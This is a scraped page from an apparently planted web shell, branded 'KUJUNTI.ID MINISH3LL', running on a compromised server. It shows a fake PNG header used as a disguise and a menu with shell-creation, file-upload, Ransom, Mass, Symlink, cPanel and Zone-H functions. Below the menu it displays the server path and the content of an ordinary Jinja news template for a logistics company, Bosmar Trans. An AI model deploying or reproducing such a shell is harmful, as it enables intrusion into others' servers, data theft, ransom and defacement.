\x89PNG\r\n\x1a\n\x00\x00\x00\x0DIHDR\x00\x00\x00\x01\x00 \x00\x00\x01\x08\x06\x00\x00\x00\x1F\x15\xC4\x89\x00\x00\x00 \x0AIDATx\x9Ccb\x00\x00\x00\x06\x00\x03\x1A\x05\x9D\x00\x00 \x00\x00IEND\xAE\x42\x60\x82 csarite.com
KUJUNTI.ID MINISH3LL
Path : /var/www/html/bosmar/TransportLogistics/templates/
(S)h3ll Cr3at0r :
F!le Upl0ad :

B-Con CMD Config cPanel C-Rdp D-Log Info Jump Mass Ransom Symlink vHost Zone-H

Current File : /var/www/html/bosmar/TransportLogistics/templates/news.html


{% extends 'base.html' %}

{% block title %}{{ _('News') }} - Bosmar Trans{% endblock %}

{% block content %}
    <!-- Page Header -->
    <div class="container my-5">
        <div class="row">
            <div class="col-12 text-center">
                <h1 class="display-4 text-primary">{{ _('LATEST NEWS') }}</h1>
                <nav aria-label="breadcrumb">
                    <ol class="breadcrumb justify-content-center">
                        <li class="breadcrumb-item"><a href="{{ url_for('index') }}">{{ _('Home') }}</a></li>
                        <li class="breadcrumb-item active" aria-current="page">{{ _('News') }}</li>
                    </ol>
                </nav>
            </div>
        </div>
    </div>
    
    <!-- News Articles -->
    <section class="py-5">
        <div class="container">
            <div class="row">
                {% for article in news %}
                <div class="col-lg-4 col-md-6 mb-4">
                    <div class="card news-card h-100">
                        <div class="position-relative">
                            <img src="{{ article.thumbnail }}" alt="{{ article.title }}" class="card-img-top news-img">
                            <div class="news-date">{{ article.date }}</div>
                        </div>
                        <div class="card-body news-content">
                            <h4>{{ article.title }}</h4>
                            <p>{{ article.content|truncate(150) }}</p>
                            <a href="{{ url_for('news_detail', news_id=article.id) }}" class="btn btn-link text-primary p-0">{{ _('Read More') }}</a>
                        </div>
                    </div>
                </div>
                {% endfor %}
            </div>
        </div>
    </section>
    
    <!-- Newsletter Subscription -->
    <section class="py-5 bg-light">
        <div class="container">
            <div class="row justify-content-center">
                <div class="col-lg-8 text-center">
                    <h2 class="text-primary mb-4">{{ _('STAY UPDATED WITH OUR NEWSLETTER') }}</h2>
                    <p class="lead mb-5">{{ _('Subscribe to receive the latest news, service updates, and industry insights from Bosmar Trans.') }}</p>
                    
                    <div class="card shadow">
                        <div class="card-body p-4">
                            <form class="row g-3" action="{{ url_for('subscribe') }}" method="post">
                                <div class="col-md-8">
                                    <input type="email" class="form-control form-control-lg" name="email" placeholder="{{ _('Your Email Address') }}" required>
                                </div>
                                <div class="col-md-4">
                                    <button type="submit" class="btn btn-primary btn-lg w-100">{{ _('Subscribe') }}</button>
                                </div>
                                <div class="col-12">
                                    <div class="form-check">
                                        <input class="form-check-input" type="checkbox" id="privacy-check" required>
                                        <label class="form-check-label small" for="privacy-check">
                                            {{ _('By subscribing, you agree to our privacy policy and consent to receive email communications from Bosmar Trans.') }}
                                        </label>
                                    </div>
                                </div>
                            </form>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </section>
    
    <!-- Industry Updates -->
    <section class="py-5">
        <div class="container">
            <div class="row">
                <div class="col-12 text-center mb-5">
                    <h2 class="text-primary">{{ _('INDUSTRY INSIGHTS') }}</h2>
                    <p>{{ _('Latest trends and developments in the logistics industry') }}</p>
                </div>
                
                <div class="col-md-6 mb-4">
                    <div class="card h-100">
                        <div class="card-body">
                            <h4 class="text-primary mb-3">{{ _('Sustainable Logistics: The Future of Transportation') }}</h4>
                            <p class="card-text">{{ _('The logistics industry is increasingly focusing on sustainability, with companies adopting eco-friendly practices and technologies to reduce their carbon footprint. From electric vehicles to optimized routing and packaging, green logistics is not just a trend but a necessity for the future.') }}</p>
                            <div class="d-flex justify-content-between align-items-center mt-3">
                                <small class="text-muted">{{ _('June 15, 2023') }}</small>
                                <span class="badge bg-secondary">{{ _('Industry Trend') }}</span>
                            </div>
                        </div>
                    </div>
                </div>
                
                <div class="col-md-6 mb-4">
                    <div class="card h-100">
                        <div class="card-body">
                            <h4 class="text-primary mb-3">{{ _('Digital Transformation in Logistics: Beyond Tracking') }}</h4>
                            <p class="card-text">{{ _('Digital technologies are revolutionizing the logistics industry, going well beyond basic tracking capabilities. Artificial intelligence, blockchain, IoT, and big data analytics are creating unprecedented transparency, efficiency, and reliability throughout the supply chain.') }}</p>
                            <div class="d-flex justify-content-between align-items-center mt-3">
                                <small class="text-muted">{{ _('May 22, 2023') }}</small>
                                <span class="badge bg-secondary">{{ _('Technology') }}</span>
                            </div>
                        </div>
                    </div>
                </div>
                
                <div class="col-md-6 mb-4">
                    <div class="card h-100">
                        <div class="card-body">
                            <h4 class="text-primary mb-3">{{ _('Supply Chain Resilience: Lessons from Recent Disruptions') }}</h4>
                            <p class="card-text">{{ _('Recent global events have highlighted the importance of building resilient supply chains. Companies are reevaluating their strategies, focusing on diversification, regionalization, and risk management to better withstand future disruptions while maintaining operational efficiency.') }}</p>
                            <div class="d-flex justify-content-between align-items-center mt-3">
                                <small class="text-muted">{{ _('April 10, 2023') }}</small>
                                <span class="badge bg-secondary">{{ _('Supply Chain') }}</span>
                            </div>
                        </div>
                    </div>
                </div>
                
                <div class="col-md-6 mb-4">
                    <div class="card h-100">
                        <div class="card-body">
                            <h4 class="text-primary mb-3">{{ _('E-commerce Logistics: Meeting the Demands of Online Retail') }}</h4>
                            <p class="card-text">{{ _('The continued growth of e-commerce is reshaping logistics operations worldwide. From last-mile delivery innovations to warehouse automation and omnichannel fulfillment, logistics providers are adapting to meet the unique challenges and opportunities presented by online retail.') }}</p>
                            <div class="d-flex justify-content-between align-items-center mt-3">
                                <small class="text-muted">{{ _('March 5, 2023') }}</small>
                                <span class="badge bg-secondary">{{ _('E-commerce') }}</span>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </section>
    
    <!-- Events Calendar -->
    <section class="py-5 bg-light">
        <div class="container">
            <div class="row">
                <div class="col-12 text-center mb-5">
                    <h2 class="text-primary">{{ _('UPCOMING INDUSTRY EVENTS') }}</h2>
                    <p>{{ _('Logistics conferences and exhibitions where Bosmar Trans will be participating') }}</p>
                </div>
                
                <div class="col-md-6 col-lg-4 mb-4">
                    <div class="card event-card h-100">
                        <div class="card-body">
                            <div class="d-flex align-items-center mb-3">
                                <div class="event-date me-3 text-center">
                                    <div class="bg-primary text-white py-1">{{ _('SEP') }}</div>
                                    <div class="bg-light py-2 fw-bold">15-17</div>
                                </div>
                                <h5 class="mb-0">{{ _('Transport Logistics Istanbul') }}</h5>
                            </div>
                            <p>{{ _('International exhibition for logistics, mobility, IT, and supply chain management.') }}</p>
                            <p class="mb-0"><i class="fas fa-map-marker-alt text-primary me-2"></i> {{ _('Istanbul Expo Center, Turkey') }}</p>
                        </div>
                    </div>
                </div>
                
                <div class="col-md-6 col-lg-4 mb-4">
                    <div class="card event-card h-100">
                        <div class="card-body">
                            <div class="d-flex align-items-center mb-3">
                                <div class="event-date me-3 text-center">
                                    <div class="bg-primary text-white py-1">{{ _('OCT') }}</div>
                                    <div class="bg-light py-2 fw-bold">10-12</div>
                                </div>
                                <h5 class="mb-0">{{ _('FDR Network Annual Conference') }}</h5>
                            </div>
                            <p>{{ _('Annual meeting of the FDR logistics network members from around the world.') }}</p>
                            <p class="mb-0"><i class="fas fa-map-marker-alt text-primary me-2"></i> {{ _('Barcelona, Spain') }}</p>
                        </div>
                    </div>
                </div>
                
                <div class="col-md-6 col-lg-4 mb-4">
                    <div class="card event-card h-100">
                        <div class="card-body">
                            <div class="d-flex align-items-center mb-3">
                                <div class="event-date me-3 text-center">
                                    <div class="bg-primary text-white py-1">{{ _('NOV') }}</div>
                                    <div class="bg-light py-2 fw-bold">22-24</div>
                                </div>
                                <h5 class="mb-0">{{ _('Global Logistics Forum') }}</h5>
                            </div>
                            <p>{{ _('International conference focusing on the future of logistics and supply chain innovation.') }}</p>
                            <p class="mb-0"><i class="fas fa-map-marker-alt text-primary me-2"></i> {{ _('Dubai, UAE') }}</p>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </section>
    
    <!-- Call to Action -->
    <section class="py-5 bg-primary text-white">
        <div class="container text-center">
            <h2 class="mb-4">{{ _('HAVE NEWS OR UPDATES TO SHARE?') }}</h2>
            <p class="lead mb-4">{{ _('If you\'re a client or partner with news related to our industry or collaboration, we\'d love to hear from you.') }}</p>
            <a href="{{ url_for('contact') }}" class="btn btn-lg btn-light">{{ _('Contact Our Media Team') }}</a>
        </div>
    </section>
{% endblock %}

© KUJUNTI.ID